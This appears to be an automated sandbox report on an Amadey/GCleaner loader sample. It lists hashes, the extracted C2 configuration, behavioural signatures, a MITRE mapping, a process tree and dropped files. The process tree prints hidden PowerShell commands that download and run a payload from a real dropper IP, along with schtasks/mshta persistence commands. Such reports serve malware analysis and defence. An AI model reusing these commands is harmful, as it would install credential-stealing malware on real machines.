Overview

overview

10

Static

static

5

c9c2667371...bd.exe

windows7-x64

10

c9c2667371...bd.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 07:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c9c266737131c566122595220c28e0bd.exe

  • Size

    938KB

  • MD5

    c9c266737131c566122595220c28e0bd

  • SHA1

    55a14ae5976cd04ac14e360c3ec0c22022f1d129

  • SHA256

    7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d

  • SHA512

    b8c23aad7ae2aa022e8d6a1d53beccbca78d4d8282318c6cd571478438c99e36293dcd24a3761764400925b4dd63c5794ffdf01e5096b181dd998c93a8a2c665

  • SSDEEP

    24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:zTvC/MTQYxsWR7a06

Score
10/10
amadeygcleaner092155defense_evasiondiscoveryexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 14 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 18 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 48 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 8 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9c266737131c566122595220c28e0bd.exe
    "C:\Users\Admin\AppData\Local\Temp\c9c266737131c566122595220c28e0bd.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn yCNUBma1NP4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\ADG9CZYBq.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2532
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn yCNUBma1NP4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\ADG9CZYBq.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1212
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\ADG9CZYBq.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2528
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7CBXNQIVLTZIOSLXGK2OPEIWZNTT7SZ2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2404
        • C:\Users\Admin\AppData\Local\Temp7CBXNQIVLTZIOSLXGK2OPEIWZNTT7SZ2.EXE
          "C:\Users\Admin\AppData\Local\Temp7CBXNQIVLTZIOSLXGK2OPEIWZNTT7SZ2.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2948
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:372
            • C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
              "C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2208
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1212
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:896
            • C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
              "C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1716
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 1048
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1992
            • C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe
              "C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"
              6⤵
              • Executes dropped EXE
              PID:1632
            • C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
              "C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2968
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 1200
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2752
            • C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
              "C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"
              6⤵
              • Executes dropped EXE
              PID:2612
            • C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
              "C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1548
            • C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
              "C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              PID:3056
              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:2996
            • C:\Users\Admin\AppData\Local\Temp\10099760101\100c737603.exe
              "C:\Users\Admin\AppData\Local\Temp\10099760101\100c737603.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2304
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn eD4H6maox3J /tr "mshta C:\Users\Admin\AppData\Local\Temp\eI4eVGFep.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                PID:572
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn eD4H6maox3J /tr "mshta C:\Users\Admin\AppData\Local\Temp\eI4eVGFep.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1716
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\eI4eVGFep.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2904
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EMS6SFDZ2P7PTEQZUEMTERRYNTN7HMHP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1324
                  • C:\Users\Admin\AppData\Local\TempEMS6SFDZ2P7PTEQZUEMTERRYNTN7HMHP.EXE
                    "C:\Users\Admin\AppData\Local\TempEMS6SFDZ2P7PTEQZUEMTERRYNTN7HMHP.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2948
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10099770121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2852
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2744
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2912
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:840
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2200
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1808
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2196
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1336
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "edCz1marfao" /tr "mshta \"C:\Temp\jFwIltEdQ.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1668
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\jFwIltEdQ.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2396
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2228
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2328
            • C:\Users\Admin\AppData\Local\Temp\10100160101\351e9cdd60.exe
              "C:\Users\Admin\AppData\Local\Temp\10100160101\351e9cdd60.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2324
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2264
            • C:\Users\Admin\AppData\Local\Temp\10100170101\dd85ca3400.exe
              "C:\Users\Admin\AppData\Local\Temp\10100170101\dd85ca3400.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1920
              • C:\Users\Admin\AppData\Local\Temp\10100170101\dd85ca3400.exe
                "C:\Users\Admin\AppData\Local\Temp\10100170101\dd85ca3400.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1672
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 1040
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2892
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 512
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1980
            • C:\Users\Admin\AppData\Local\Temp\10100180101\aa549fb4b9.exe
              "C:\Users\Admin\AppData\Local\Temp\10100180101\aa549fb4b9.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:1520
            • C:\Users\Admin\AppData\Local\Temp\10100190101\ce3d772e4c.exe
              "C:\Users\Admin\AppData\Local\Temp\10100190101\ce3d772e4c.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:2280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Defense Evasion

Modify Registry

3
T1112

Subvert Trust Controls

1
T1553

Install Root Certificate

1
T1553.004

Virtualization/Sandbox Evasion

2
T1497

Credential Access

Credentials from Password Stores

1
T1555

Credentials from Web Browsers

1
T1555.003

Unsecured Credentials

3
T1552

Credentials In Files

3
T1552.001

Discovery

Browser Information Discovery

1
T1217

Query Registry

4
T1012

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Virtualization/Sandbox Evasion

2
T1497

Lateral Movement

Collection

Data from Local System

3
T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\E2737F1178184885.dat
    Filesize

    46KB

    MD5

    02d2c46697e3714e49f46b680b9a6b83

    SHA1

    84f98b56d49f01e9b6b76a4e21accf64fd319140

    SHA256

    522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

    SHA512

    60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

    Download Submit

  • C:\Temp\jFwIltEdQ.hta
    Filesize

    779B

    MD5

    39c8cd50176057af3728802964f92d49

    SHA1

    68fc10a10997d7ad00142fc0de393fe3500c8017

    SHA256

    f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

    SHA512

    cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    71KB

    MD5

    83142242e97b8953c386f988aa694e4a

    SHA1

    833ed12fc15b356136dcdd27c61a50f59c5c7d50

    SHA256

    d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

    SHA512

    bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\service[1].htm
    Filesize

    1B

    MD5

    cfcd208495d565ef66e7dff9f98764da

    SHA1

    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

    SHA256

    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

    SHA512

    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
    Filesize

    2.9MB

    MD5

    30c1a6337089e68b975438caebc8f497

    SHA1

    2cf2324672cf72b9bc1869633f3bf6904bb61011

    SHA256

    db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017

    SHA512

    be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
    Filesize

    361KB

    MD5

    2bb133c52b30e2b6b3608fdc5e7d7a22

    SHA1

    fcb19512b31d9ece1bbe637fe18f8caf257f0a00

    SHA256

    b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630

    SHA512

    73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe
    Filesize

    1.7MB

    MD5

    971c0e70de5bb3de0c9911cf96d11743

    SHA1

    43badfc19a7e07671817cf05b39bc28a6c22e122

    SHA256

    67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d

    SHA512

    a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
    Filesize

    2.0MB

    MD5

    6006ae409307acc35ca6d0926b0f8685

    SHA1

    abd6c5a44730270ae9f2fce698c0f5d2594eac2f

    SHA256

    a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b

    SHA512

    b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
    Filesize

    968KB

    MD5

    5d43f5bb6521b71f084afe8f3eab201a

    SHA1

    e4fab1d3fc8d69c0a9eed0d1eb3a2ea735767914

    SHA256

    5e4fcbbd458a244fcf2dc879ffabdbc6feba611a5934887e6eefc5b42d5ca37d

    SHA512

    5829a227c0ac7645706e4a3a8ec976947a31f9fd610fb0c600d8ef3efa7e6133c9e640843c35b274ed322dbfd9ddd33b6774ed5d3738aae47214e3ee305ee49a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
    Filesize

    6.8MB

    MD5

    dab2bc3868e73dd0aab2a5b4853d9583

    SHA1

    3dadfc676570fc26fc2406d948f7a6d4834a6e2c

    SHA256

    388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb

    SHA512

    3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
    Filesize

    429KB

    MD5

    22892b8303fa56f4b584a04c09d508d8

    SHA1

    e1d65daaf338663006014f7d86eea5aebf142134

    SHA256

    87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

    SHA512

    852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10099760101\100c737603.exe
    Filesize

    938KB

    MD5

    976ac2cfc16607ca38559bb8662d867f

    SHA1

    76058ea4fc55559959dc9c60ee677d7072dbdd09

    SHA256

    0e2fd09772738a5b730ccb4ea7fe05284e0939c8e19143225c5d01f955da86a8

    SHA512

    553c5b4b435eea4fddd436d5dd14248eb9da25a11366c2a7f0035d14ef29ea53ecde2fbf28cca661ca6d0d0c101c5d30ad145c8ca7a679cd20e1cbfee563b3a9

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10099770121\am_no.cmd
    Filesize

    1KB

    MD5

    cedac8d9ac1fbd8d4cfc76ebe20d37f9

    SHA1

    b0db8b540841091f32a91fd8b7abcd81d9632802

    SHA256

    5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

    SHA512

    ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10100160101\351e9cdd60.exe
    Filesize

    3.8MB

    MD5

    1f59f823cb567f64b66569604b2be6ef

    SHA1

    f01f3035077e1e166f132cca38615639a4d9adee

    SHA256

    687a003fd3d125b452accd657fd0ca30c9df82ede6ef4a314b06977fae905909

    SHA512

    a7d5ba0fe6de91807af4bf730fde52fdfefc104b4a0be9a985146db974909680e8a5df7ce50392ea7552a8bf581b586274877cef40fead9dd6eadc06f591fc86

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10100170101\dd85ca3400.exe
    Filesize

    445KB

    MD5

    c83ea72877981be2d651f27b0b56efec

    SHA1

    8d79c3cd3d04165b5cd5c43d6f628359940709a7

    SHA256

    13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482

    SHA512

    d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10100180101\aa549fb4b9.exe
    Filesize

    1.8MB

    MD5

    a0e7380e127024b9dd06476141033d5d

    SHA1

    58e1a177ce7984503d7de0fc43778a49cf49a28d

    SHA256

    545df7012fea392d05caa7544870779b65c3e1b04eed30a336ae5864ab47b9a9

    SHA512

    b6c86edf9015091fab6ea19131c1b4dd4162d61078731295dcaf8f98cd978507f3cb03b7010e3f5369d98c182641cd91f252124e90f4d2458a2fa6270c8c55a4

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10100190101\ce3d772e4c.exe
    Filesize

    3.0MB

    MD5

    08e051ea37ac0ed3a95157feb9ca84d5

    SHA1

    ba4d4874ebab9144fb201db4b2cd1585f8e178ef

    SHA256

    f7e26c84f78595805564e716ba3f92809a11e54d1ea9a3a33be83105642d789b

    SHA512

    fcede7f69c2510ba11f6c9df9f94e2174ad207a3c55b63ab675cac1b14267bb8b21aed49907a636baa41237622834e1eb694d0ec013d7c60a87bb76427f089c5

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\ADG9CZYBq.hta
    Filesize

    717B

    MD5

    ce2826dafbb3027391985120af53e53e

    SHA1

    bfe499a79e36fc541f33b75af5e2fcaa3de33098

    SHA256

    5ad9a9f2373f966cea5f0b364f00d76475aa86ee21679d31a5af20d0565d7cc9

    SHA512

    a7b8b88ef8df97b47c2e037eccc4d6e11882adfb890e0254d04fcb7e37133739916a7e02f5589083f1a51545866c42f52de4f9976ebde6a2675eab77c2566609

    Download Submit

